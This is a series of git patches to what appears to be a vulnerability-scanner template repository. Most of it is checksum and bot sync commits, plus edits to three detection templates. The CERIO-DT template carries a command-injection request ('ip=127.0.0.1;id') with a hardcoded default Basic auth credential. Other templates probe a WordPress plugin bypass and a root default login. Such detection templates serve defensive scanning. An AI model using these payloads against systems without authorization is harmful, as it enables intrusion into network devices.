-http/cves/2023/CVE-2023-28662.yaml:222138e63a1f9e06b5f00d0888a71b3ab9c5cbc2 +http/cves/2023/CVE-2023-28662.yaml:ad336c6a3427d0b47407455c18a117052d0bff5a http/cves/2023/CVE-2023-28665.yaml:f7cbf06ff60743045c2b85276c87e28b0182c049 http/cves/2023/CVE-2023-29084.yaml:c13b9fdcac929cdff02edcde7bd85a1b97fd8c31 http/cves/2023/CVE-2023-29298.yaml:2dd762a56ce650feb87703cf13af9ad126d8103a @@ -3036,7 +3036,7 @@ http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b http/cves/2023/CVE-2023-3219.yaml:30c6a139afeb951daf2ed2734dcae25ef3db05ca http/cves/2023/CVE-2023-32235.yaml:97088e4dd3fc67bdf37659084e1c32fdb2670818 http/cves/2023/CVE-2023-32243.yaml:bcbf1f8b9ae1c03a606866feaffa2c71ba08878b -http/cves/2023/CVE-2023-32315.yaml:e083330b0d26565dca2ede8a3c21d3eb54b253f2 +http/cves/2023/CVE-2023-32315.yaml:4006dcea314168a66f3d898049017ac193275066 http/cves/2023/CVE-2023-32563.yaml:3ac13df7389a44c872cfc4bb0916de89c6912b40 http/cves/2023/CVE-2023-33338.yaml:64557689950914621e4b59c37bab423ac5ad636a http/cves/2023/CVE-2023-33405.yaml:fd578aece75fa256b7e9d6fbfd1d5beac0ac400c @@ -3055,7 +3055,7 @@ http/cves/2023/CVE-2023-34192.yaml:9ec18d446637d67669489485e338d8bb08e3e95a http/cves/2023/CVE-2023-34259.yaml:c522d53c7b0766136d4356c8330eb60fbe2ff6a7 http/cves/2023/CVE-2023-34362.yaml:5e6a1ddcdf96d45153174df95d001082d9e22b1c http/cves/2023/CVE-2023-34537.yaml:ce2b42c314ea85f2cf7f4081e19600bcd2c5db7c -http/cves/2023/CVE-2023-34598.yaml:1be9a6039ef50f2c4d57ec9bcc6f72221843af61 +http/cves/2023/CVE-2023-34598.yaml:586bd46c54d95b6e72b3840c99dd993b235c68b8 http/cves/2023/CVE-2023-34599.yaml:252d4509a26d36ab69876630693c3bf216802eb3 http/cves/2023/CVE-2023-3460.yaml:88688540a54e02217069f7359cdbe3ddfde15289 http/cves/2023/CVE-2023-34659.yaml:752f2d986befb41386fb76463ee258482a720d80 @@ -3183,7 +3183,7 @@ http/cves/2023/CVE-2023-46347.yaml:45e9463fdbd5e2ec433e92f26e86c456fae42ffa http/cves/2023/CVE-2023-46359.yaml:2c5eadff5358c49c151934a282621b2bfce3bf92 http/cves/2023/CVE-2023-46574.yaml:3ee23f056a218c79387d3ae1c3cdbb51aeba5191 http/cves/2023/CVE-2023-46747.yaml:b010f6e5c18a3f337a7f2e266f9330a39635d36c -http/cves/2023/CVE-2023-46805.yaml:916b3454c9764492dc7ae8ee347edf46837e3c81 +http/cves/2023/CVE-2023-46805.yaml:0291b05889fcafa128183288afb7bd84e7db4b00 http/cves/2023/CVE-2023-47115.yaml:f5f0d4869bc075f448f560f87f29febd4cc63497 http/cves/2023/CVE-2023-4714.yaml:954bbf773a17e757e0e6643ef410202037e7c8f1 http/cves/2023/CVE-2023-47211.yaml:bf40361838f0afc267bc6c62161b3f0526a2b234 @@ -3231,7 +3231,7 @@ http/cves/2023/CVE-2023-6623.yaml:182c33805efba63a9f987417b6e13ce81c8643e9 http/cves/2023/CVE-2023-6634.yaml:d517962a1689dbbaefe2ea502e451ba9009f1dd5 http/cves/2023/CVE-2023-6831.yaml:d1a44c75188bceced79fce8fe5b7f31e1e824e4b http/cves/2023/CVE-2023-6875.yaml:2e8817b2133461b7fdb1b0d59f4c197202c3bd60 -http/cves/2023/CVE-2023-6895.yaml:584cf32c7d75ecd6dd264de23662de3855103f05 +http/cves/2023/CVE-2023-6895.yaml:280030bb44a21b5263dd9f29092154566d82fde7 http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14 @@ -3246,7 +3246,7 @@ http/cves/2024/CVE-2024-0352.yaml:e324d6ccb69d2bee50aa487f5e068cc005c715d8 http/cves/2024/CVE-2024-0713.yaml:391fe60dbb13edaff0fb693b1b25fb71dcfb0241 http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437 http/cves/2024/CVE-2024-1021.yaml:a48c4dce997dffd7ee3b988bc0dc646f2cf840d7 -http/cves/2024/CVE-2024-1061.yaml:3ca4c2f35a403c5067ef7b8795b307417436fa4f +http/cves/2024/CVE-2024-1061.yaml:df85be53c1a8e56e06eb9abf580e173b7d9b984d http/cves/2024/CVE-2024-1071.yaml:f9280444cf13a8677b365b28c1bf7cd991829d9c http/cves/2024/CVE-2024-1183.yaml:13a0cbff374005b467ac0b663f895021b5d981a8 http/cves/2024/CVE-2024-1208.yaml:e0b4c4dbc3dc37bbb522622e5dd6c882f02b05b8 @@ -3259,9 +3259,9 @@ http/cves/2024/CVE-2024-1709.yaml:ef74f7909789dfeec2ad788dc3fb37ba5d06e270 http/cves/2024/CVE-2024-20767.yaml:2b596e323ac39c761e0cf7efc3cbc4a772079a0d http/cves/2024/CVE-2024-21644.yaml:2156925d0fe7c84d0e8b43f7681bcd2409386996 http/cves/2024/CVE-2024-21645.yaml:5bd013f892b97ec56eefc5dc0b423d8b62e66864 -http/cves/2024/CVE-2024-21887.yaml:cb8d4d94a8080fecc469fb969cc160593ba3982e -http/cves/2024/CVE-2024-21893.yaml:64a8c554db1ed2abfcbc75e53be146faec3f10f2 -http/cves/2024/CVE-2024-22024.yaml:224f5d9d9a963ca2833b033e443665bca843216c +http/cves/2024/CVE-2024-21887.yaml:a3fd62da315d80a98fc1b4d8101d6b65babf26df +http/cves/2024/CVE-2024-21893.yaml:7ac92ba24a2d8b42594efe52a920aca9a9dd760b +http/cves/2024/CVE-2024-22024.yaml:9a4da0db5d10fde48c88f49e52f798220ceea7db http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb http/cves/2024/CVE-2024-22927.yaml:55eada76a32a5cb2d7c30cebb426f9efb40a0c7c @@ -8558,7 +8558,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c703523bfec4c8d187b64761937a051ab2d45a4f +templates-checksum.txt:21262ffbe74e95362afde026f8b21f4603084781 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0b74846d743b2cc4dd62259b72e153c088b39230 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 24 May 2024 10:56:32 +0530 Subject: [PATCH 212/847] minor update --- http/cves/2022/CVE-2022-1580.yaml | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/http/cves/2022/CVE-2022-1580.yaml b/http/cves/2022/CVE-2022-1580.yaml index 4dca43836e..d7ae9a80db 100644 --- a/http/cves/2022/CVE-2022-1580.yaml +++ b/http/cves/2022/CVE-2022-1580.yaml @@ -6,6 +6,7 @@ info: severity: medium description: | The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature. + remediation: Fixed in 1.5.3 reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-1580 - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/ @@ -15,14 +16,16 @@ info: cve-id: CVE-2022-1580 cwe-id: CWE-639 epss-score: 0.00058 - epss-percentile: 0.23919 + epss-percentile: 0.24444 cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:* metadata: + verified: true + max-request: 1 vendor: freehtmldesigns product: site_offline framework: wordpress - tags: wpscan,cve2022,bypass,wordpress,wordpress-plugin - + publicwww-query: "/wp-content/plugins/site-offline/" + tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp flow: http(1) && http(2) http: @@ -46,7 +49,8 @@ http: words: - "wp-block" - "author" - condition: or + condition: and + - type: status status: - 200 From ec1b66cf894ded4a33670361715d0bf66233fe4b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 24 May 2024 11:18:46 +0530 Subject: [PATCH 213/847] name and matcher type update --- http/cves/2022/CVE-2022-1580.yaml | 18 +++++++----------- 1 file changed, 7 insertions(+), 11 deletions(-) diff --git a/http/cves/2022/CVE-2022-1580.yaml b/http/cves/2022/CVE-2022-1580.yaml index d7ae9a80db..967f1b2b8b 100644 --- a/http/cves/2022/CVE-2022-1580.yaml +++ b/http/cves/2022/CVE-2022-1580.yaml @@ -1,15 +1,15 @@ id: CVE-2022-1580 info: - name: Site Offline WP Plugin < 1.5.3 - Access Bypass + name: Site Offline WP Plugin < 1.5.3 - Authorization Bypass author: Kazgangap severity: medium description: | The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature. remediation: Fixed in 1.5.3 reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-1580 - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1580 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 @@ -26,6 +26,7 @@ info: framework: wordpress publicwww-query: "/wp-content/plugins/site-offline/" tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp + flow: http(1) && http(2) http: @@ -43,14 +44,9 @@ http: path: - "{{BaseURL}}/?admin" - matchers-condition: and matchers: - - type: word - words: - - "wp-block" - - "author" + - type: dsl + dsl: + - 'contains_all(body, "wp-block", "author")' + - 'status_code == 200' condition: and - - - type: status - status: - - 200 From d2f6043f490a335e45e2de8c1f79544361309ce0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 05:55:41 +0000 Subject: [PATCH 214/847] Auto Generated New Template Addition List [Fri May 24 05:55:40 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e69de29bb2..ea08acdc7f 100644 --- a/.new-additions +++ b/.new-additions @@ -0,0 +1 @@ +http/cves/2022/CVE-2022-1580.yaml From a9e646e091b348b82d88565591357c657692e892 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 05:55:46 +0000 Subject: [PATCH 215/847] Auto Generated Templates Checksum [Fri May 24 05:55:46 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9189aa4173..7d5c766de5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2502,6 +2502,7 @@ http/cves/2022/CVE-2022-1398.yaml:8168fc6638082f59e200f1101d369a35f0d123ed http/cves/2022/CVE-2022-1439.yaml:cbe0052e425f9e50c6b1c8f5485bf9324a314ff9 http/cves/2022/CVE-2022-1442.yaml:a52d96a918ba3035fe49f7fd40e49109c6071868 http/cves/2022/CVE-2022-1574.yaml:a5798fd0745aa94b4223ab067849053809d1218c +http/cves/2022/CVE-2022-1580.yaml:e5f9bcc61e6fbd74c2ad70c0c6b790127a952acc http/cves/2022/CVE-2022-1595.yaml:c64eac9bb84bf79b3d25cf6f2dacb4fce225c9f7 http/cves/2022/CVE-2022-1597.yaml:0fd2522119f23d28516369b0f6e579ab802d032c http/cves/2022/CVE-2022-1598.yaml:9755cec2c1a4c02ba84abdc819c53082af2ab59e @@ -8558,7 +8559,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:21262ffbe74e95362afde026f8b21f4603084781 +templates-checksum.txt:420cd51492085071f2013177d28b721de25e3c22 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 50780f29d9721c35bd26f46f3b89f53c0112d86a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 05:56:23 +0000 Subject: [PATCH 216/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 37f01c16d6..eb128ebd4d 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cves/2022/CVE-2022-1580.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 88bcce9ecb4edb8aeb6c66c61f8915dbb690aaa7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 05:57:38 +0000 Subject: [PATCH 217/847] Auto Template Signing [Fri May 24 05:57:38 UTC 2024] :robot: --- http/cves/2022/CVE-2022-1580.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2022/CVE-2022-1580.yaml b/http/cves/2022/CVE-2022-1580.yaml index 967f1b2b8b..bb9095f37a 100644 --- a/http/cves/2022/CVE-2022-1580.yaml +++ b/http/cves/2022/CVE-2022-1580.yaml @@ -50,3 +50,4 @@ http: - 'contains_all(body, "wp-block", "author")' - 'status_code == 200' condition: and +# digest: 490a0046304402205775924c4103208abbf0e83892c8a44428ab42b0f64f7a401f435217841af96a02205f982b0c88cdde5b367ddf12f3e1f257b13a8394de22ca29e2d34b4f3d37cedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 12e7d6a9e03a0e254230ab3c7658ecacc541727c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 24 May 2024 11:44:27 +0530 Subject: [PATCH 218/847] Update cambium-networks-default-login.yaml --- .../cambium-networks/cambium-networks-default-login.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml index 8e8af91d8d..fd5a8e520f 100644 --- a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml +++ b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: title="Welcome to Canopy" - tags: default-login,cambium-networks + tags: default-login,cambium,canopy http: - raw: @@ -37,7 +37,6 @@ http: part: body words: - "Logged in as root" - condition: and - type: status status: From 1af6114dcb2b959aeb774af55f8c25d4efce6d28 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 24 May 2024 11:51:58 +0530 Subject: [PATCH 219/847] Update cerio-dt-rce.yaml --- http/vulnerabilities/other/cerio-dt-rce.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/other/cerio-dt-rce.yaml b/http/vulnerabilities/other/cerio-dt-rce.yaml index 985d765643..b1879b1709 100644 --- a/http/vulnerabilities/other/cerio-dt-rce.yaml +++ b/http/vulnerabilities/other/cerio-dt-rce.yaml @@ -1,7 +1,7 @@ id: cerio-dt-rce info: - name: CERIO-DT Save.cgi interface - Command Execution + name: CERIO-DT Interface - Command Execution author: pussycat0x severity: critical description: | @@ -11,6 +11,8 @@ info: - https://github.com/tanjiti/sec_profile - https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md metadata: + max-request: 1 + verified: true fofa-query: title="DT-100G-N" || title="DT-300N" || title="DT-100G" || title="AMR-3204G" || title="WMR-200N" tags: cerio,rce @@ -21,7 +23,6 @@ http: Host: {{Hostname}} Authorization: Basic b3BlcmF0b3I6MTIzNA== Content-Type: application/x-www-form-urlencoded - Content-Length: 33 pid=2061&ip=127.0.0.1;id×=1 @@ -31,7 +32,6 @@ http: part: body regex: - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" - condition: and - type: status status: From 34f38c4283095a70298d723fd022da537b09d891 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 06:22:27 +0000 Subject: [PATCH 220/847] Auto Generated New Template Addition List [Fri May 24 06:22:27 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ea08acdc7f..35199e09a7 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ http/cves/2022/CVE-2022-1580.yaml +http/default-logins/cambium-networks/cambium-networks-default-login.yaml From 04a4c29907c4cd553708ca4c2ad12c19144e3113 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 06:22:34 +0000 Subject: [PATCH 221/847] Auto Generated Templates Checksum [Fri May 24 06:22:34 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7d5c766de5..16095914c1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2502,7 +2502,7 @@ http/cves/2022/CVE-2022-1398.yaml:8168fc6638082f59e200f1101d369a35f0d123ed http/cves/2022/CVE-2022-1439.yaml:cbe0052e425f9e50c6b1c8f5485bf9324a314ff9 http/cves/2022/CVE-2022-1442.yaml:a52d96a918ba3035fe49f7fd40e49109c6071868 http/cves/2022/CVE-2022-1574.yaml:a5798fd0745aa94b4223ab067849053809d1218c -http/cves/2022/CVE-2022-1580.yaml:e5f9bcc61e6fbd74c2ad70c0c6b790127a952acc +http/cves/2022/CVE-2022-1580.yaml:0e94c20783866096e69931ba80caccbf03b74fdb http/cves/2022/CVE-2022-1595.yaml:c64eac9bb84bf79b3d25cf6f2dacb4fce225c9f7 http/cves/2022/CVE-2022-1597.yaml:0fd2522119f23d28516369b0f6e579ab802d032c http/cves/2022/CVE-2022-1598.yaml:9755cec2c1a4c02ba84abdc819c53082af2ab59e @@ -3339,6 +3339,7 @@ http/default-logins/barco-clickshare-default-login.yaml:cac1f9f84f536daf4f7d3b21 http/default-logins/batflat/batflat-default-login.yaml:983b4bc3ea5162cd92de42686894cfde4482ca8d http/default-logins/bloofoxcms-default-login.yaml:521262f1b70cf41dabf50e7022c8d6874ad6f472 http/default-logins/caimore/caimore-default-login.yaml:fa6dc9fbfefd35cbe6b0122cbe2063f51286d122 +http/default-logins/cambium-networks/cambium-networks-default-login.yaml:2efac1e32f1a75cf4cae77732fb0521d5f2eff44 http/default-logins/camunda/camunda-default-login.yaml:e0ba275d0aeadc4a4e0df5010277d2db9e6329e7 http/default-logins/chinaunicom/chinaunicom-default-login.yaml:825cceb7abec9ba21938e316e8748da23c72c82a http/default-logins/cobbler/cobbler-default-login.yaml:2994d59f748f3b084644bb25989f6ecc8ea81a2a @@ -8559,7 +8560,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:420cd51492085071f2013177d28b721de25e3c22 +templates-checksum.txt:4849b4f936d4b7f5410130c66d61bf8ca3d30850 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 23c9e98cca80bd4462e0c1a80673c830190eb864 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 06:23:14 +0000 Subject: [PATCH 222/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index eb128ebd4d..72d43adf0a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cves/2022/CVE-2022-1580.yaml' + - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 39aeb0f16a47d9c9a1835cfd512bb1973538c648 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 06:24:30 +0000 Subject: [PATCH 223/847] Auto Template Signing [Fri May 24 06:24:30 UTC 2024] :robot: --- .../cambium-networks/cambium-networks-default-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml index fd5a8e520f..eeacaeb7fa 100644 --- a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml +++ b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml @@ -41,3 +41,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022060ca7e028b3cacd5e75c469c3b8df897700ecb1fa9e91f15b05eb6a50d9f2d31022100ab396afa79123b660bb4784387663ed5eb3f9767485f162c73fbe565f1fa8bbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 56f2522fae65b743729b8b823ba710d172196e3f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 06:26:10 +0000 Subject: [PATCH 224/847] Auto Generated New Template Addition List [Fri May 24 06:26:10 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 35199e09a7..b9e19bdf1d 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ http/cves/2022/CVE-2022-1580.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml +http/vulnerabilities/other/cerio-dt-rce.yaml From 881dfddd2a219abdd84da7730a5e145b38c44762 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 06:26:19 +0000 Subject: [PATCH 225/847] Auto Generated Templates Checksum [Fri May 24 06:26:18 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 16095914c1..0b9638e791 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3339,7 +3339,7 @@ http/default-logins/barco-clickshare-default-login.yaml:cac1f9f84f536daf4f7d3b21 http/default-logins/batflat/batflat-default-login.yaml:983b4bc3ea5162cd92de42686894cfde4482ca8d http/default-logins/bloofoxcms-default-login.yaml:521262f1b70cf41dabf50e7022c8d6874ad6f472 http/default-logins/caimore/caimore-default-login.yaml:fa6dc9fbfefd35cbe6b0122cbe2063f51286d122 -http/default-logins/cambium-networks/cambium-networks-default-login.yaml:2efac1e32f1a75cf4cae77732fb0521d5f2eff44 +http/default-logins/cambium-networks/cambium-networks-default-login.yaml:8ddd3872b928f4d2a97a7240e5f4b71ae5a2e1f5 http/default-logins/camunda/camunda-default-login.yaml:e0ba275d0aeadc4a4e0df5010277d2db9e6329e7 http/default-logins/chinaunicom/chinaunicom-default-login.yaml:825cceb7abec9ba21938e316e8748da23c72c82a http/default-logins/cobbler/cobbler-default-login.yaml:2994d59f748f3b084644bb25989f6ecc8ea81a2a @@ -7676,6 +7676,7 @@ http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml:2c49088f1d34938eb http/vulnerabilities/other/carrental-xss.yaml:d92d2f7000cc91fd9c13049464b3ce0369c7b33e http/vulnerabilities/other/castel-digital-sqli.yaml:a2e2da7ae8d480b2bf621f6b11979cc2d8a434ff http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:5cc2684a9526439bcafcefeb5f6799fde0bbb067 +http/vulnerabilities/other/cerio-dt-rce.yaml:f3184ec767f634d6e174fa303e67b3c5866236f7 http/vulnerabilities/other/chamilo-lms-sqli.yaml:27b1d49422d8918bf53b61424d7aee17a6bee23d http/vulnerabilities/other/chamilo-lms-xss.yaml:a4317a1e2cc11bf9333dcebbed04c9a16dc71199 http/vulnerabilities/other/citrix-xenapp-log4j-rce.yaml:bb592cb50df3e8b218c8c655b5a4ce12d1abf72c @@ -8560,7 +8561,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4849b4f936d4b7f5410130c66d61bf8ca3d30850 +templates-checksum.txt:ded924c130659798c79761c79766daf4ed16044f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From af0cf349d676c3082e4a418cb0af8ae0180e59e6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 24 May 2024 06:27:01 +0000 Subject: [PATCH 226/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 72d43adf0a..446dd43db4 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cves/2022/CVE-2022-1580.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' + - 'http/vulnerabilities/other/cerio-dt-rce.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 187e4835d4665604482a46cac1c74fe6f1238294 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 06:28:03 +0000 Subject: [PATCH 227/847] Auto Template Signing [Fri May 24 06:28:03 UTC 2024] :robot: --- http/vulnerabilities/other/cerio-dt-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/other/cerio-dt-rce.yaml b/http/vulnerabilities/other/cerio-dt-rce.yaml index b1879b1709..098c30ca5d 100644 --- a/http/vulnerabilities/other/cerio-dt-rce.yaml +++ b/http/vulnerabilities/other/cerio-dt-rce.yaml @@ -36,3 +36,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100f224cdd25f048596ecd1215e571598f1ebb9dcd7f38a628a14cf03e868e6f771022100e151ddd0d44531d2d80838a64578b6f86748aec1f806133b33cbc0d41ec6d3f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 91a9bc02f9fc22f443b27972324e9056b9928c2a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 24 May 2024 06:49:57 +0000 Subject: [PATCH 229/847] Auto Generated Templates Checksum [Fri May 24 06:49:57 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0b9638e791..e2066f0b78 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6537,7 +6537,7 @@ http/takeovers/canny-takeover.yaml:cc5a760aa65559322a94344f7add91e523a63db1 http/takeovers/cargo-takeover.yaml:42db7ee4771a5cbddc6e2b8072070c583d6fd452 http/takeovers/cargocollective-takeover.yaml:dde78512f960c62936577c19801b1446ec65d5d3 http/takeovers/clever-takeover.yaml:f4d45f5b42f376d3258d2b4140a9dad14e25cd87 -http/takeovers/flexbe-takeover.yaml:e447e7c68c38eea9703f93af0b5560f9e10211ed +http/takeovers/flexbe-takeover.yaml:7f0d8cd2e79c498ac544390dd9f4e0f7db448bcc http/takeovers/frontify-takeover.yaml:e7700c7ad9bb5a761d8bd1395c6a5360c91b3dcb http/takeovers/gemfury-takeover.yaml:69d22f9c935be01d0ebad5946a9766eafe12fc68 http/takeovers/getresponse-takeover.yaml:5eff48c5b7d27eeede3d2e7fba1a8a6f314fa9bd @@ -7676,7 +7676,7 @@ http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml:2c49088f1d34938eb http/vulnerabilities/other/carrental-xss.yaml:d92d2f7000cc91fd9c13049464b3ce0369c7b33e http/vulnerabilities/other/castel-digital-sqli.yaml:a2e2da7ae8d480b2bf621f6b11979cc2d8a434ff http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:5cc2684a9526439bcafcefeb5f6799fde0bbb067 